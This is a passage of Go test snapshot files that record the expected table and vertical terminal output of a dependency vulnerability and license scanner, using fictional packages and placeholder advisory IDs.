PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VER ≈ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/GHSA-123 │ │ │ │ │ ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ 8.3 │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/GHSA-123 │ │ │ │ │ ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/GHSA-123 │ │ │ │ │ ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬───────────┬──────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSI ≈ ├───────────────────────┼──────┼───────────┼─────────┼───────────┼──────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine3 │ 0.10.2-rc │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴───────────┴──────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VER ≈ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴────────── ≈ --- ================================================ FILE: internal/output/__snapshots__/vertical_test.snap ================================================ [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@3.2.5 (Apache-2.0) 1 license violation found in sbom:/path/to/my/second/lockfile unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. NuGet unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found Packagist lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: author1/mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: author1/mine1@1.2.3 (MIT) 1 license violation found in unknown:/path/to/my/third/lockfile npm sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@3.2.5 (Apache-2.0) 1 license violation found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@3.2.5 (Apache-2.0) 1 license violation found in sbom:/path/to/my/second/lockfile unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT, Apache-2.0) 2 license violations found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@ (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found no license violations found --- [TestPrintVerticalResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile no license violations found unknown:/path/to/my/third/lockfile: found 0 packages with issues Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. license violations found: mine1@1.2.3 (Apache-2.0) mine1@1.3.5 (MIT) 2 license violations found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile no license violations found unknown:/path/to/my/third/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in unknown:/path/to/my/third/lockfile license violations found: mine1@1.2.3 (Apache-2.0) mine1@1.3.5 (MIT) 2 license violations found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@ has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile no license violations found unknown:/path/to/my/third/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in unknown:/path/to/my/third/lockfile license violations found: mine1@1.2.3 (Apache-2.0) mine1@1.3.5 (MIT) 2 license violations found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. npm lockfile:/path/to/lockfile: found 0 packages with issues no known vulnerabilities found 1 deprecated packages found: deprecated-pkg@1.0.0 --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues Hiding 1 number of vulnerabilities deemed unimportant, use --all-vulns to show them. license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile license violations found: mine1@1.2.3 (MIT) 1 license violation found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile no license violations found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found license violations found: mine2@5.9.0 (MIT) 1 license violation found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 2 packages with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 2 packages with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 2 packages with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 2 packages with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 3 known vulnerabilities found in sbom:/path/to/my/second/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 0 packages with issues no known vulnerabilities found sbom:/path/to/my/second/lockfile: found 0 packages with issues no known vulnerabilities found unknown:/path/to/my/third/lockfile: found 0 packages with issues no known vulnerabilities found --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile unknown:/path/to/my/third/lockfile: found 1 package with issues mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in unknown:/path/to/my/third/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. NuGet sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile Packagist lockfile:/path/to/my/first/lockfile: found 1 package with issues author1/mine1@1.2.3 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in lockfile:/path/to/my/first/lockfile sbom:/path/to/my/second/lockfile: found 1 package with issues author3/mine3@0.4.1 has the following known vulnerabilities: OSV-3: Something mildly scary! Severity: '4.3'; Minimal Fix Version: 'No fix available'; OSV-5: Something scarier! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 2 known vulnerabilities found in sbom:/path/to/my/second/lockfile npm lockfile:/path/to/my/first/lockfile: found 1 package with issues mine1@1.2.2 has the following known vulnerabilities: OSV-1: Something scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in lockfile:/path/to/my/first/lockfile --- [TestPrintVerticalResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. NuGet sbom:/path/to/my/second/lockfile: found 1 package with issues mine2@3.2.5 has the following known vulnerabilities: OSV-2: Something less scary! Severity: 'N/A'; Minimal Fix Version: 'No fix available'; 1 known vulnerability found in sbom:/path/to/my/second/lockfile Packagist lockfile:/path/to/my/first/lockfile: found 1 package with issues author1/mine1@1.2.3 has the following known vulnerabilities: OSV-5: Something 